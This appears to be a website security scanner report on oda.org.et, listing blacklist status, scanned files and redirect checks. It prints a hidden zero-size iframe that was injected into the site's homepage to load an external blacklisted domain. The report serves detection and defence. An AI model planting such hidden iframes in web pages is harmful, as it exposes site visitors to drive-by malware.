Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oda.org.et
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.oda.org.et/ | 200 OK Content-Length: 29169 Content-Type: text/html | malicious |
Page code contains blacklisted domain: quake2012.ru ...[4450 bytes skipped]... lt;/TBODY></TABLE> <SCRIPT> <!-- tlp_sfu(); //for scroller text //--> </SCRIPT> </P> <p style="text-align: center">Credits: <a href="http://www.dynamicdrive.com/style/">Dynamic Drive CSS Library</a></p> </div> </div> </body> <iframe src="http://quake2012.ru" width="0" height="0" frameborder="0" sandbox="allow-forms allow-top-navigation allow-same-origin allow-scripts"></iframe> </html> Malicious iFrame found. size: 0x0 src: http://quake2012.ru This URL is marked by Google as suspicious <iframe src="http://quake2012.ru" width="0" height="0" frameborder="0" sandbox="allow-forms allow-top-navigation allow-same-origin allow-scripts"> | ||
http://www.oda.org.et/Scripts/popups1.js | 200 OK Content-Length: 1844 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
function mmLoadMenus() { if (window.mm_menu_0929112151_0) return; window.mm_menu_0929112151_0 = new Menu("root",119,18,"",15,"#FFFFFF","#CCFF00","#003366","#0033CC","left","middle",3,0,300,-5,7,true,true,true,0,true,true); mm_menu_0929112151_0.addMenuItem("Establishment","location='Pages/Aboutus.htm#establishment'"); mm_menu_0929112151_0.addMenuItem("Mission","location='Pages/Aboutus.htm#mission'"); mm_menu_0929112151_0.ad mm_menu_0929120952_0.addMenuItem("Trainings","location='Pages/Trainings.htm'"); mm_menu_0929120952_0.hideOnMouseOut=true; mm_menu_0929120952_0.bgColor='#003366'; mm_menu_0929120952_0.menuBorder=1; mm_menu_0929120952_0.menuLiteBgColor='#ffffff'; mm_menu_0929120952_0.menuBorderBgColor='#0099ff'; mm_menu_0929120952_0.writeMenus(); } Antivirus reports:
| ||
http://www.oda.org.et/Scripts/mm_menu.js | 200 OK Content-Length: 29972 Content-Type: application/javascript | clean |
http://www.oda.org.et/Scripts/scroller.js | 200 OK Content-Length: 576 Content-Type: application/javascript | clean |
http://www.oda.org.et/jquery-1.2.6.pack.js | 200 OK Content-Length: 31033 Content-Type: application/javascript | clean |
http://www.oda.org.et/stepcarousel.js | 200 OK Content-Length: 15358 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://www.oda.org.et/jqueryslidemenu.js | 200 OK Content-Length: 2439 Content-Type: application/javascript | clean |
http://www.oda.org.et/Scripts/newsbar.js | 200 OK Content-Length: 2267 Content-Type: application/javascript | clean |
http://www.oda.org.et/Pages/Aboutus.htm | 200 OK Content-Length: 15639 Content-Type: text/html | clean |
http://www.oda.org.et/Pages/../Scripts/popups.js | 200 OK Content-Length: 1868 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
function mmLoadMenus() { if (window.mm_menu_0929112151_0) return; window.mm_menu_0929112151_0 = new Menu("root",119,18,"",15,"#FFFFFF","#CCFF00","#003366","#0033CC","left","middle",3,0,300,-5,7,true,true,true,0,true,true); mm_menu_0929112151_0.addMenuItem("Establishment","location='../Pages/Aboutus.htm#establishment'"); mm_menu_0929112151_0.addMenuItem("Mission","location='../Pages/Aboutus.htm#mission'"); mm_menu_092911215 mm_menu_0929120952_0.addMenuItem("Trainings","location='../Pages/Trainings.htm'"); mm_menu_0929120952_0.hideOnMouseOut=true; mm_menu_0929120952_0.bgColor='#003366'; mm_menu_0929120952_0.menuBorder=1; mm_menu_0929120952_0.menuLiteBgColor='#ffffff'; mm_menu_0929120952_0.menuBorderBgColor='#0099ff'; mm_menu_0929120952_0.writeMenus(); } Antivirus reports:
| ||
http://www.oda.org.et/Pages/../Scripts/mm_menu.js | 200 OK Content-Length: 29972 Content-Type: application/javascript | clean |
http://www.oda.org.et/Pages/../Scripts/scroller.js | 200 OK Content-Length: 576 Content-Type: application/javascript | clean |
http://www.oda.org.et/Pages/../Scripts/clockforoda.js | 200 OK Content-Length: 5854 Content-Type: application/javascript | clean |
http://www.oda.org.et/Pages/../index.html | 200 OK Content-Length: 29169 Content-Type: text/html | malicious |
Page code contains blacklisted domain: quake2012.ru ...[4450 bytes skipped]... lt;/TBODY></TABLE> <SCRIPT> <!-- tlp_sfu(); //for scroller text //--> </SCRIPT> </P> <p style="text-align: center">Credits: <a href="http://www.dynamicdrive.com/style/">Dynamic Drive CSS Library</a></p> </div> </div> </body> <iframe src="http://quake2012.ru" width="0" height="0" frameborder="0" sandbox="allow-forms allow-top-navigation allow-same-origin allow-scripts"></iframe> </html> Malicious iFrame found. size: 0x0 src: http://quake2012.ru This URL is marked by Google as suspicious <iframe src="http://quake2012.ru" width="0" height="0" frameborder="0" sandbox="allow-forms allow-top-navigation allow-same-origin allow-scripts"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oda.org.et
Result:
GET / HTTP/1.1
Host: oda.org.et
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: oda.org.et
Referer: http://www.google.com/search?q=oda.org.et
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oda.org.et
Referer: http://www.google.com/search?q=oda.org.et
Result:
The result is similar to the first query. There are no suspicious redirects found.